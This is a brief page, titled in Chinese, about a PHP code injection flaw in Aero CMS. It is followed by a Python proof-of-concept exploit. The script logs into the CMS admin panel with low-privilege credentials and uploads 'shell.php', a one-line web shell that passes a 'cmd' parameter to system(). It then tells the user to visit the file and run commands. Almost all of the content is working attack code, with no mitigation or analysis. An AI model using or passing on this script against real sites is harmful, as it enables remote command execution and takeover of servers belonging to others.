CVE-2022-50944 Aero CMS PHP代码注入漏洞

import requests # Target configuration target_url = "http://target-ip/aerocms" login_url = f"{target_url}/admin/login.php" upload_url = f"{target_url}/admin/posts.php" # Attacker credentials (requires low privilege) username = "attacker" password = "password" # Malicious PHP code php_code = "<?php system($_GET['cmd']); ?>" # 1. Login to get session session = requests.Session() payload = { "username": username, "password": password, "login": "submit" } session.post(login_url, data=payload) # 2. Upload malicious file files = { 'image': ('shell.php', php_code, 'application/octet-stream') } data = { 'source': 'add_post', 'title': 'Test Post' } response = session.post(upload_url, files=files, data=data) if response.status_code == 200: print("[+] File uploaded successfully.") print("[+] Try accessing the uploaded file to execute commands.") else: print("[-] Upload failed.")